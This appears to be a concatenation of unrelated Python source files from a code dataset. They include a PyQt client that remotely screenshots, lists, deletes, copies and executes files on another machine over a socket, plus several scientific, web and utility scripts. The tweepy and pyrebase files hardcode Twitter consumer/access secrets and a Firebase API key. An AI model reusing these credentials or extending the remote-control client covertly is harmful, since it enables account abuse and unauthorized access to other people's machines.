file\")\n\t\tself.toolBar.addAction(deleteAction)\n\n\t\tcopyAction = QtGui.QAction(QtGui.QIcon('images/copy.png'), 'Copies a file', self)\n\t\tcopyAction.triggered.connect(self.copy)\n\t\tself.toolBar = self.addToolBar(\"Copy a file\")\n\t\tself.toolBar.addAction(copyAction)\n\n\t\texecAction = QtGui.QAction(QtGui.QIcon('images/execute.png'), 'Executes a file', 
self)\n\t\texecAction.triggered.connect(self.execute)\n\t\tself.toolBar = self.addToolBar(\"Execute a file\")\n\t\tself.toolBar.addAction(execAction)\n\n\t\tcolor = QtGui.QColor(0, 0, 0)\n\n\t\tfontColor = QtGui.QAction('Font bg Color', self)\n\t\tfontColor.triggered.connect(self.color_picker)\n\t\tself.toolBar.addAction(fontColor)\n\n\t\tself.styleChoice = QtGui.QLabel(\"\", self)\n\t\tself.styleChoice.move(0, 0)\n\t\tself.styleChoice.setGeometry(1, 1, 800, 400)\n\t\tcomboBox = QtGui.QComboBox(self)\n\t\tcomboBox.addItem(\"motif\")\n\t\tcomboBox.addItem(\"Windows\")\n\t\tcomboBox.addItem(\"cde\")\n\t\tcomboBox.addItem(\"Plastique\")\n\t\tcomboBox.addItem(\"Cleanlooks\")\n\n\t\tcomboBox.move(0, 50)\n\t\tself.styleChoice.move(0, 150)\n\t\tcomboBox.activated[str].connect(self.style_choice)\n\n\t\tself.show()\n\n\tdef color_picker(self):\n\t\tcolor = QtGui.QColorDialog.getColor()\n\t\tself.styleChoice.setStyleSheet(\"QWidget { background-color: %s}\" % color.name())\n\n\tdef style_choice(self, text):\n\t\tself.styleChoice.setText(text)\n\t\tQtGui.QApplication.setStyle(QtGui.QStyleFactory.create(text))\n\n\tdef close_application(self):\n\t\tchoice = QtGui.QMessageBox.question(self, 'Qutting!', \"Are you sure you want to exit the app?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)\n\t\tif choice == QtGui.QMessageBox.Yes:\n\t\t\tsys.exit()\n\t\telse:\n\t\t\tpass\n\n\tdef print_screen(self):\n\t\tself.send_request_to_server(self.my_socket, \"TAKE_SCREENSHOT\")\n\t\tself.send_request_to_server(self.my_socket, \"SEND_FILE B:/newimage.jpg\")\n\t\tnewfile = open('B:\\\\newimage.jpg', 'wb')\n\t\twhile True:\n\t\t\tdata = self.my_socket.recv(1024)\n\t\t\tnewfile.write(data)\n\t\t\tif \"Image sent!\" in data:\n\t\t\t\tbreak\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Image recieved!', 'The image has been recevied.')\n\n\tdef directory(self):\n\t\ttext, ok = QInputDialog.getText(self, 'Enter your desired directory', 'Please entire your desired directory:')\n\t\tif ok and text != '':\n\t\t\ttext = 'DIR ' + text\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Contents:', str(self.my_socket.recv(1024)))\n\n\tdef delete(self):\n\t\ttext, ok = QInputDialog.getText(self, 'Enter your desired file', 'Please entire your desired file:')\n\t\tif ok and text != '':\n\t\t\ttext = 'DELETE ' + text\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Deleted!', 'File has been deleted!')\n\n\tdef copy(self):\n\t\ttext1, ok1 = QInputDialog.getText(self, 'Enter your desired file', 'Please entire your desired file:')\n\t\ttext2, ok2 = QInputDialog.getText(self, 'Enter your desired destination', 'Please entire your desired destination:')\n\t\tif ok1 and ok2 and text1 != '' and text2 != '':\n\t\t\ttext = 'COPY ' + text1 + \" \" + text2\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Copied!', 'File has been copied!')\n\n\tdef execute(self):\n\t\ttext, ok = QInputDialog.getText(self, 'Enter your desired file', 'Please entire your desired file:')\n\t\tif ok and text != '':\n\t\t\ttext = \"EXECUTE \" + text\n\t\t\tself.send_request_to_server(self.my_socket, str(text))\n\t\t\tpopup = QtGui.QMessageBox.information(self, 'Executed!', 'File has been executed!')\n\n\t@staticmethod\n\tdef send_request_to_server(my_socket, request):\n\t\tmy_socket.send(request)\n\napp = QtGui.QApplication(sys.argv)\nGUI = 
Window()\nsys.exit(app.exec_())\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"137488035","text":"\"\"\"\nProject 1 - Problem 2 (P1)\n\"\"\"\n\n########################################################\n######## X-MAC: Trade_off Energy with Delay using GT\n########################################################\n# Radio subsystem varaible definition\n\nP = 32. # Payload [byte]\nR = 31.25 # CC2420 Radio Rate [kbyte/s = Byte/ms]\nD = 8 # number of levels\nC = 5 # neighbors size (connectivity)\nN = C*D**2 # number of nodes\n#### BE CAREFUL: Times are in milliseconds (ms)\nLmax = 5000. # Maximal allowed Delay (ms)\nEmax = 1. # MAximal Energy Budjet (J)\n\nL_pbl = 4. # preamble length [byte]\nL_hdr = 9. + L_pbl # header length [byte]\nL_ack = 9. + L_pbl # ACK length [byte]\nL_ps = 5. + L_pbl # preamble strobe length [byte]\n\nTal = 0.95 # ack listen period [ms]\nThdr = L_hdr/R # header transmission duration [ms]\nTack = L_ack/R # ACK transmission duration [ms]\nTps = L_ps/R # preamble strobe transmission duration [ms]\nTcw = 15*0.62 # Contention window size [ms]\nTcs = 2.60 # Time [ms] to turn the radio into TX and probe the channel (carrier sense)\nTdata = Thdr + P/R + Tack # data packet transmission duration [ms]\n\n### Sampling frequency\n# Fs = 1.0/(60*30*1000) # e.g. Min traffic rate 1 pkt/half_hour = 1/(60*30*1000) pk/ms\nFs = 1./(5*60*1000) #default\n\n# Sleep period: Parameter Bounds\nTw_max = 500. # Maximum Duration of Tw in ms\nTw_min = 100. # Minimum Duration of Tw in ms\n\n\ndef Nd(d):\n if d == 0:\n return 1\n return (2*d - 1)*C\n\ndef Id(d):\n if d == 0:\n return C\n elif d == D:\n return 0\n return (2*d + 1)/(2*d - 1)\n # return Nd(d+1)/Nd(d)\n\ndef Fout(d):\n if d == D:\n return Fs\n return Fs*(D**2 - d**2 + 2*d - 1)/(2*d - 1)\n # return FI(d)+Fs\n\ndef FI(d):\n if d == 0:\n return Fs*C*D**2\n return Fs*(D**2 - d**2)/(2*d - 1)\n # return Id(d)*Fout(d+1)\n\ndef FB(d):\n return (C - Id(d))*Fout(d)\n\ndef Etx(d, Tw):\n return (Tcs + Tal + Ttx(Tw))*Fout(d)\n\ndef Ttx(Tw):\n return (Tw/2 + Tack + Tdata)\n\n# d = 1 # first ring\n# α1 = Tcs + Tal + (3/2)*Tps*((Tps + Tal)/2 + Tack + Tdata)*FB(d)\n# α2 = Fout(d)/2\n# α3 = ((Tps + Tal)/2 + Tcs + Tal + Tack + Tdata)*Fout(d) + ((3/2)*Tps + Tack + Tdata)*FI(d) + (3/4)*Tps*FB(d)\n\n# d = D # last ring\n# β1 = sum(1/2 for i in range(1, d+1))\n# β2 = sum(Tcw/2 + Tdata for i in range(1, d+1))\n\n# # print(α1, α2, α3, β1, β2)\n\n# E = lambda Tw: α1/Tw + α2*Tw + α3\n# L = lambda Tw: β1*Tw + β2\n\n#########\n# Plots #\n#########\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n# (a) The energy as a function of Tw, where Tw=[Twmin, Twmax] = [100, 500] ms\n# Tw = np.linspace(Tw_min/1000,Tw_max/1000,100)\n# Tw = np.linspace(Tw_min,Tw_max,100)\nTw_linsp = np.linspace(70,500,100)\n# Tw_linsp = np.linspace(70/1000,500/1000,100)\n\nfig = plt.figure()\nax = fig.add_subplot(1, 1, 1)\nax.spines['left'].set_position('center')\nax.spines['bottom'].set_position('zero')\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\n\n# plt.plot(Tw, E(Tw), 'blue', label='Energy E(Tw)')\n# plt.legend(loc='lower left')\n# plt.xlabel(\"Tw\")\n# plt.show()\n\n# minute = [1,5,10,15,20,25,30] #minutes\n# Fs = 1./(minute[1]*60*1000)\n\n# d = 1 # first ring\n# α1 = Tcs + Tal + (3/2)*Tps*((Tps + Tal)/2 + Tack + 
Tdata)*FB(d)\n# α2 = Fout(d)/2\n# α3 = ((Tps + Tal)/2 + Tcs + Tal + Tack + Tdata)*Fout(d) + ((3/2)*Tps + Tack + Tdata)*FI(d) + (3/4)*Tps*FB(d)\n\n# d = D # last ring\n# β1 = sum(1/2 for i in range(1, d+1))\n# β2 = sum(Tcw/2 + Tdata for i in range(1, d+1))\n\n# E = lambda Tw: α1/Tw + α2*Tw + α3\n# L = lambda Tw: β1*Tw + β2\n\n\n\n# %%\n################\n# Optimization #\n################\n\n# def P1():\nfrom gpkit import Variable, VectorVariable, Model\nfrom gpkit.nomials import Monomial, Posynomial, PosynomialInequality\n\nLmax_range = [1000,2000,3000,4000,5000]\n\nfor minute in [5,10,15,20,25,30]: #minutes\n Fs = 1./(minute*60*1000)\n\n d = 1 # first ring\n α1 = Tcs + Tal + (3/2)*Tps*((Tps + Tal)/2 + Tack + Tdata)*FB(d)\n α2 = Fout(d)/2\n α3 = ((Tps + Tal)/2 + Tcs + Tal + Tack + Tdata)*Fout(d) + ((3/2)*Tps + Tack + Tdata)*FI(d) + (3/4)*Tps*FB(d)\n\n d = D # last ring\n β1 = sum(1/2 for i in range(1, d+1))\n β2 = sum(Tcw/2 + Tdata for i in range(1, d+1))\n\n E = lambda Tw: α1/Tw + α2*Tw + α3\n L = lambda Tw: β1*Tw + β2\n\n Tw = Variable(\"Tw\")\n\n objective = α1/Tw + α2*Tw + α3\n constraints = [ β1*Tw + β2 <= 5000,\n Tw >= Tw_min,\n Id(0)*Etx(1,Tw) <= 1/4\n ]\n m = Model(objective, constraints)\n sol = m.solve(verbosity=0)\n print(str(minute) + 'min:')\n print(sol.table())\n # print(sol[\"cost\"])\n # print(sol[\"variables\"][Tw])\n\n # Plot Energy(Tw)\n plt.plot(Tw_linsp, E(Tw_linsp), random.choice(\"bgrcmyk\"), label='Energy E(Tw) for Fs(' + str(minute) + 'min) = ' + str(Fs)[:4] + str(Fs)[-4:])\n\n # Plot Energy(Tw) optimal point\n ax.scatter(sol[\"variables\"][Tw], sol[\"cost\"], color='red')\n\nplt.title('Lmax = ' + str(5000))\nplt.xlabel(\"Tw [ms]\")\nplt.legend(loc='upper right')\nplt.show()\n\n# %%\n","sub_path":"ex2_p1.py","file_name":"ex2_p1.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"43390372","text":"import pyrebase\n\nconfig = {\n \"apiKey\": \"AIzaSyDKstoSby1YdpTfy7xqAiDPt5Ta50PoOIw\",\n \"authDomain\": \"nomad-e1934.firebaseapp.com\",\n \"databaseURL\": \"https://nomad-e1934.firebaseio.com\",\n \"projectId\": \"nomad-e1934\",\n \"storageBucket\": \"nomad-e1934.appspot.com\",\n}\n\nfirebase = pyrebase.initialize_app(config)\n\n# Database Variable\ndb = firebase.database()\n\ncurrentState = ''\n\ndef getState():\n state = db.child(\"PiMove\").get()\n currentState = state\n\ndef stream_handler(message):\n print(message[\"event\"])\n print(message[\"path\"]) \n print(message[\"data\"])\n\n\nmy_stream = db.child(\"PiMove\").child(\"Movement\").stream(stream_handler)","sub_path":"nomadBackend/python/nomadBrain.py","file_name":"nomadBrain.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264556647","text":"#!/usr/bin/python\n\nimport csv\n \nencabezado = True\n\nwith open('archivo.csv') as File:\n reader = csv.reader(File, delimiter=',', quotechar=',',quoting=csv.QUOTE_MINIMAL)\n for row in reader:\n if (encabezado == False):\n if float(row[4])>1200 :\n print(row[1])\n encabezado = False","sub_path":"computacion2/exercises/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"352247953","text":"from django.conf.urls import patterns, url\nfrom rmc import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.home, name='home'),\n\turl(r'^chef/', 
views.chef, name='chef'),\n\turl(r'^events/', views.events, name='events'),\n\turl(r'^menus/', views.menus, name='menus'),\n\turl(r'^inquiry/', views.inquiry, name='inquiry'),\n)","sub_path":"rmc/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"138655545","text":"import tweepy\n\n# consumer key and secret\nconsumer_key = 'Lfz4zIl81lxWH2JsnjYRjfSSy'\nconsumer_secret = 'UJOKsHAGOh44V8rwp7oRH5ljeXhR2ph2vNd85FpKH0jxLJm1OE'\n\n# access token and secret\naccess_token = '746872621-vGxyYKMQvIMVC2qyNnexlGllJZGJ1gS9C0GynFKc'\naccess_token_secret = 'TgNBfyCs92r1NMDxyR1rL00dqY8FAXTwYV8yFXJFhzmMQ'\n\n# connecting for authentication\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n# OAuthHandler equipped with an access token\nauth.set_access_token(access_token, access_token_secret)\n\napi = tweepy.API(auth)\n\nget_data = api.search('@Abhishekkumbhaj')\n\nfor i in get_data:\n print(i.text)\n","sub_path":"TextBlob__Tweepy/tweepy_demo.py","file_name":"tweepy_demo.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"463323691","text":"import csv\nimport qrcode\nimport base64\nfrom io import BytesIO\n\n\ndef save_iterable_to_a_file(iterable, filename):\n f = open(filename, \"w+\")\n [f.write(f\"{x}\\n\") for x in iterable]\n f.close()\n\n\ndef read_data(file_name):\n \"\"\"\nfrom applications.core.utils import read_data\nread_data(\"fixtures/info.csv\")\n :param file_name:\n :return:\n \"\"\"\n info_file = open(file_name)\n reader = csv.reader(info_file)\n all_rows = list()\n for r in reader:\n all_rows.append(r)\n\n return all_rows\n\n\ndef extract_categories(file_name):\n \"\"\"\nfrom applications.core.utils import extract_categories\nextract_categories(\"fixtures/info.csv\")\n :param file_name:\n :return:\n \"\"\"\n all_rows = read_data(file_name)\n categories = {r[3].lower() for r in all_rows}\n subcategories = {r[4].lower() for r in all_rows}\n categories_attached = {f\"{r[3].lower()} - {r[4].lower()}\" for r in all_rows}\n save_iterable_to_a_file(categories, \"fixtures/categories.txt\")\n save_iterable_to_a_file(subcategories, \"fixtures/subcategories.txt\")\n save_iterable_to_a_file(categories_attached, \"fixtures/categories_attached.txt\")\n\n\ndef get_base64_qr_code(data):\n qr_image = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n qr_image.add_data(data)\n qr_image.make(fit=True)\n\n img = qr_image.make_image()\n\n buffered_image = BytesIO()\n img.save(buffered_image, format=\"JPEG\")\n return base64.b64encode(buffered_image.getvalue()).decode()","sub_path":"applications/core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135274231","text":"import sys\nimport os\nimport cv2\nimport os.path as osp\nimport numpy as np\nimport time\nimport pdb\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\n\n# from deeplab.model_dplv3_plus_meta_v3 import Res_Dplv3_Decoder \nfrom deeplab.model_dplv3_plus_meta_v2 import Res_Dplv3_Decoder \nfrom deeplab.datasets import DavisTestDataset\n# from new_loss import 
class_balanced_cross_entropy_loss as balanced_bce_loss \n\nfrom mvos_utils import *\nimport pdb\n\n# gpu setting \nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\ncudnn.enabled = True\ncudnn.benchmark = True\n\n# meta learning setting\nlayer5_bn_name = ['layer5.assp.0.1', 'layer5.assp.1.1', 'layer5.assp.2.1', 'layer5.assp.3.1', \n 'layer5.image_pool.2', 'layer5.encode_fea.1', 'layer5.low_level_fea.1',\n 'layer5.decode_1.1', 'layer5.decode_2.1']\ntrain_mode = 'block_4_5'\nmeta_restore_from = './snapshots/meta_davis17.pth'\nnormal_restore_from = './snapshots/base_seg.pth'\nn_meta_init = 50\nname_suffix = ''\n\n\n# dataset setting\ncfg = {}\ncfg['img_root'] = './dataset/davis/JPEGImages/480p'\ncfg['gt_root'] = './dataset/davis/Annotations/480p_split'\ncfg['list_root'] = './dataset/davis/ImageSets/2017/val_w_imgs_no.txt'\ncfg['crop_size'] = (480, 854)\ncfg['img_mean'] = np.array((104.00698793,116.66876762,122.67891434), dtype=np.float32)\ncfg['random_scale'] = False\ncfg['random_mirror'] = False\ncfg['ignore_label'] = 0\ncfg['num_steps'] = n_meta_init\ncfg['batch_size'] = 1\ncfg['max_label'] = 1.0\n\n\n# get sequences\nimg_ids = [i_id.strip() for i_id in open(cfg['list_root'])]\nseq_numbers = len(img_ids)\n\n\n# create network\nmodel = Res_Dplv3_Decoder(num_classes=1, output_stride=16)\ninterp = nn.Upsample(size=cfg['crop_size'], mode='bilinear')\ncriterion = nn.BCEWithLogitsLoss().cuda()\nsigmoid = nn.Sigmoid()\n\n\n# testing save root\nmeta_model_name = meta_restore_from.split('/')[-1][:-4]\nsave_root_prefix = '_'.join(['./results/davis-17-val/' + meta_model_name, str(n_meta_init), name_suffix])\n\ntotal_runtime = 0.\n# process sequence\nfor i in range(seq_numbers):\n cur_seq_name = img_ids[i].split()[0]\n cur_seq_range = int(img_ids[i].split()[1])\n cur_seq_image_path = osp.join(cfg['img_root'], cur_seq_name)\n cur_seq_label_path = osp.join(cfg['gt_root'], cur_seq_name)\n\n # set learnable parameters\n train_all_features = set_trainable_feas(train_mode)\n model.set_learnable_params(train_all_features, layer5_bn_name)\n\n # load non-meta-trained model\n saved_state_dict = torch.load(normal_restore_from)\n model.load_state_dict(saved_state_dict)\n bn_params = get_bn_params(saved_state_dict, train_all_features, layer5_bn_name)\n\n # load meta-trained model\n saved_state_dict = torch.load(meta_restore_from)\n meta_init = saved_state_dict['meta_init']\n meta_alpha = saved_state_dict['meta_alpha']\n model.copy_meta_weights(meta_init)\n model.train()\n model.cuda()\n\n # meta-initialize the model\n model_weights = OrderedDict()\n for name, p in model.named_parameters():\n if name.split('.')[0] in train_all_features and name not in bn_params:\n model_weights[name] = p\n\n # frozen bn or not\n for name, m in model.named_modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False\n\n ol_trainloader = data.DataLoader(DavisTestDataset(cfg, cur_seq_name), batch_size=cfg['batch_size'],\n shuffle=True, num_workers=0, pin_memory=True)\n\n # meta-finetune on first frame\n tic = time.time()\n print (\"Meta-Training on %s...\" % cur_seq_name)\n for i_iter, batch in enumerate(ol_trainloader):\n image, label = batch\n image = Variable(image).cuda()\n label = Variable(label).cuda()\n pred = interp(model.forward(image, model_weights, train_mode, bn_params))\n\n loss = criterion(pred, label)\n grads = torch.autograd.grad(loss, model_weights.values(), retain_graph=False, create_graph=True)\n model_weights = OrderedDict((name, param - 
torch.mul(meta_alpha,grad)) for \n ((name, param), (_, meta_alpha), grad) in\n zip(model_weights.items(), meta_alpha.items(), grads))\n #print ('loss is %f' % loss.data.cpu().numpy())\n \n #if i_iter == n_meta_init:\n # break\n\n print ('Meta fine-tuning time is : %.2f' % (time.time() - tic))\n\n # update model parameters\n model.copy_meta_weights(model_weights)\n\n\n # online testing\n model.eval()\n print (\"Evaluate on %s...\" % cur_seq_name)\n cur_save_root = save_root_prefix + '/' + cur_seq_name + '/'\n if not osp.exists(cur_save_root):\n os.makedirs(cur_save_root)\n\n output = label.data[0, 0].cpu().numpy()\n output = np.array(output*255, dtype=np.uint8)\n cv2.imwrite(cur_save_root + '00000.png', output)\n for j in range(1, cur_seq_range):\n # tic = time.time()\n img_file = osp.join(cur_seq_image_path, '%05d' % j + '.jpg')\n img, ori_img_size = load_image_label_davis17(img_file, cfg['crop_size'])\n output = model(Variable(img, volatile = True).cuda())\n output = sigmoid(interp(output)).cpu().data[0,0].numpy()\n # print ('Per frame forward time is : %.2f' % (time.time() - tic))\n if not (ori_img_size==cfg['crop_size']):\n #output = cv2.resize(output, ori_img_size[::-1], interpolation = cv2.INTER_NEAREST)\n output = cv2.resize(output, ori_img_size[::-1], interpolation = cv2.INTER_LINEAR)\n output = np.array(output*255, dtype=np.uint8)\n cv2.imwrite(cur_save_root + '/%05d' % j + '.png', output)\n\n total_runtime += (time.time() - tic) / (cur_seq_range - 1)\n\nprint ('Average per-frame runtime is : {}'.format(total_runtime/seq_numbers))\n","sub_path":"demo_mvos_davis17.py","file_name":"demo_mvos_davis17.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"587329811","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom itertools import *\nfrom operator import itemgetter\nfrom fnmatch import fnmatch\nimport sys, csv\nimport time\n\ndef group_wc_in_full(d_wc, merge_full):\n reslist = []\n res_no_matches = []\n for wc in d_wc:\n matches = 0\n for full in merge_full:\n if match(full[1], wc[1]):\n matches += 1\n if matches == 1:\n cont = 0\n for full in merge_full:\n if match(full[1], wc[1]):\n new_key = full[0] + \", (\" + wc[0] + \")\"\n merge_full[cont] = (new_key, full[1])\n cont += 1\n if matches > 1:\n cont = 0\n for full in merge_full:\n if match(full[1], wc[1]):\n new_key = full[0] + \", [\" + wc[0] + \"]\"\n merge_full[cont] = (new_key, full[1])\n cont += 1\n if matches == 0:\n res_no_matches.append(wc)\n return merge_full, res_no_matches\n\n\ndef group_no_wc(mergelist):\n reslist = []\n total_keys = []\n for i in range(len(mergelist)):\n isMatch = False\n compared = False\n keys = []\n anyval = None\n keys.append(mergelist[i][0])\n if mergelist[i][0] in total_keys:\n continue\n for j in range(i + 1, len(mergelist)):\n if mergelist[j][0] in total_keys:\n continue\n compared = True\n if mergelist[i][1] == mergelist[j][1]:\n isMatch = True\n keys.append(mergelist[j][0])\n total_keys.append(mergelist[j][0])\n anyval = mergelist[j][1]\n if compared:\n if isMatch:\n str_keys = \", \".join(keys)\n new_item = (str_keys, anyval)\n reslist.append(new_item)\n else:\n reslist.append(mergelist[i])\n return reslist\n\n\ndef match(v1, v2):\n if not \"-\" in v1 and not \"-\" in v2:\n return v1 == v2\n v1_reg = v1.replace(\"-\", \"?\")\n cont = 0\n for s in v2:\n if s == \"-\":\n v1_reg = v1_reg[:cont] + \"?\" + v1_reg[cont + 1:]\n cont += 1\n return fnmatch(v2, v1_reg)\n\n\ndef 
group_nonmatched(nonmatched):\n pivot = nonmatched[0]\n res = []\n res.append(pivot)\n for i in range(1, len(nonmatched)):\n count = 0\n keys = []\n keys.append(nonmatched[i][0])\n for j in range(len(res)):\n try:\n a = res[j]\n except IndexError:\n continue\n if match(nonmatched[i][1], res[j][1]):\n count += 1\n keys.append(str(res[j][0]))\n del (res[j])\n if count == 0:\n res.append(nonmatched[i])\n else:\n new_tuple = (\", \".join(keys), nonmatched[i][1])\n res.append(new_tuple)\n for i in range(len(res)):\n res[i] = (\"{\" + res[i][0] + \"}\", res[i][1])\n return res\n\n\ndef merger(input_file_name, output_file_name):\n t = time.process_time()\n input_file = open(input_file_name, 'r', encoding='utf8')\n input_file_csv = csv.reader(input_file, delimiter=',')\n input_file_list = list(input_file_csv)\n d = {}\n print('start', len(input_file_list[1:]))\n for line in input_file_list[1:]:\n str_line = \"\".join(line[3:len(line)])\n d[line[0]] = str_line\n input_file.close()\n # d_full = list((key, value) for key, value in d.iteritems())\n d_no_wc = list((key, value) for key, value in d.items() if not \"-\" in value)\n d_wc = list((key, value) for key, value in d.items() if \"-\" in value)\n\n # 1- merge_full <= MERGE d_no_wc\n merge_full = group_no_wc(d_no_wc)\n\n # 2- merge_full_wc <= MERGE d_wc in merge_full\n merge_full_wc, wc_no_match = group_wc_in_full(d_wc, merge_full)\n\n # 3 merge nonmatched\n if len(wc_no_match) > 0:\n merged_wc_no_match = group_nonmatched(wc_no_match)\n else:\n merged_wc_no_match = []\n\n final = merged_wc_no_match + merge_full_wc\n idx = 0\n for row in final:\n positions = {}\n ids = row[0]\n ids = ids.replace(\"(\", \"\").replace(\")\", \"\")\n ids = ids.replace(\"[\", \"\").replace(\"]\", \"\")\n ids = ids.replace(\"{\", \"\").replace(\"}\", \"\")\n ids = ids.replace(\" \", \"\")\n ids = ids.split(',')\n for id in ids:\n id_clean = id.replace(\" \", \"\")\n for line in input_file_list:\n if line[0] == id_clean:\n positions.setdefault(line[1], []).append((id_clean, line[2]))\n # get most common element in list (dict keys)\n # if position:\n if len(positions) > 0:\n chromosome = max(set(positions.keys()), key=list(positions.keys()).count)\n _id, position = min(positions[chromosome], key=lambda x: x[1])\n final[idx] += (chromosome, position, _id,)\n else:\n final[idx] += ('', '', '',)\n idx += 1\n output_file = open(output_file_name, 'w')\n for item in final:\n row = list()\n row.append('\"' + item[0] + '\"') # ids\n row.append(item[2]) # chromosome\n row.append(item[3]) # position\n for c in item[1]:\n row.append(c)\n output_file.write(\",\".join(row) + \"\\n\")\n print('end', len(final))\n elapsed_time = time.process_time() - t\n print('in seconds: ', elapsed_time)\n output_file.close()\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser() # pylint: disable=invalid-name\n parser.add_argument(\"-i\", \"--input\", help=\"Input file\")\n parser.add_argument(\"-o\", \"--output\", help=\"Output file\")\n args = parser.parse_args() # pylint: disable=invalid-name\n merger(args.input, args.output)\n","sub_path":"merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":5743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"533665542","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ilp - a tag based file indexer\n#\n# Author: slowpoke \n#\n# This program is Free Software under the non-terms\n# of the Anti-License. 
Do whatever the fuck you want.\n\nimport os\n\nfrom .utils import funcmap, funcset\n\n\nclass Index:\n\n \"\"\"A collection of files and their associated tags.\n\n This object is immutable and changes no other state. All methods which\n would cause a state change return a new index object instead, with the\n changes applied.\n\n The index contains three major data structures:\n\n - a mapping of files to their content's hashes\n - a mapping of hashes to all filenames they identify\n - a mapping of all tags names to a set of the filenames they tag\n\n \"\"\"\n\n files = property(lambda self: self._files)\n tags = property(lambda self: self._tags)\n hashes = property(lambda self: self._hashes)\n\n def __init__(self, files=None, tags=None, hashes=None):\n self._files = funcmap() if files is None else funcmap(files)\n self._tags = funcmap() if tags is None else funcmap(tags)\n self._hashes = funcmap() if hashes is None else funcmap(hashes)\n\n @classmethod\n def new(cls, files=None, tags=None, hashes=None):\n return cls(files, tags, hashes)\n\n def add_file(self, path, hashstring):\n \"\"\"Add a new file to the index.\"\"\"\n if path in self.files and self.files.get(path) != hashstring:\n raise ValueError(\n \"Path exists in the database, but has a different hash.\")\n new_files = self.files.set(path, hashstring)\n pathlist = self.hashes.get(hashstring, funcset())\n new_hashes = self.hashes.set(\n hashstring,\n pathlist.add(path))\n return self.new(new_files, self.tags, new_hashes)\n\n def remove_file(self, path):\n \"\"\"Remove a path from the index.\n\n NOTE: Even if you remove the last duplicate of a file from the index,\n it will still store the hash, albeit with an empty list of paths\n associated with it.\n\n \"\"\"\n if not path in self.files:\n raise KeyError(\"Path not in the index: {}\".format(path))\n hashstring = self.files.get(path)\n new_files = self.files.remove(path)\n pathlist = self.hashes.get(hashstring, funcset())\n new_hashes = self.hashes.set(\n hashstring,\n pathlist.discard(path))\n return self.new(new_files, self.tags, new_hashes)\n\n def add_tag(self, name):\n \"\"\"Add a new tag to the index.\n\n This method will silently return if the tag already exists.\n\n \"\"\"\n if name in self.tags:\n raise KeyError(\"Tag already in the index: {}\".format(name))\n return self.new(\n self.files,\n self.tags.set(name, funcset()),\n self.hashes)\n\n def remove_tag(self, name):\n \"\"\"Remove a tag from the index.\"\"\"\n if name not in self.tags:\n raise KeyError(\"Tag not in the index: {}\".format(name))\n return self.new(\n self.files,\n self.tags.remove(name),\n self.hashes)\n\n def tag_file(self, path, tag_name):\n \"\"\"Tag a file.\"\"\"\n if tag_name not in self.tags:\n raise KeyError(\"Tag not in the index: {}\".format(tag_name))\n if path not in self.files:\n raise KeyError(\"Path not in the index: {}\".format(path))\n hashstring = self.files.get(path)\n new_tag = self.tags.get(tag_name).add(hashstring)\n return self.new(\n self.files,\n self.tags.set(tag_name, new_tag),\n self.hashes)\n\n def untag_file(self, path, tag_name):\n \"\"\"Untag a file.\"\"\"\n if tag_name not in self.tags:\n raise KeyError(\"Tag not in the index: {}\".format(tag_name))\n if path not in self.files:\n raise KeyError(\"Path not in the index: {}\".format(path))\n hashstring = self.files.get(path)\n new_tag = self.tags.get(tag_name).discard(hashstring)\n return self.new(\n self.files,\n self.tags.set(tag_name, new_tag),\n self.hashes)\n\n def file_has_tag(self, path, tag_name):\n \"\"\"Check if a 
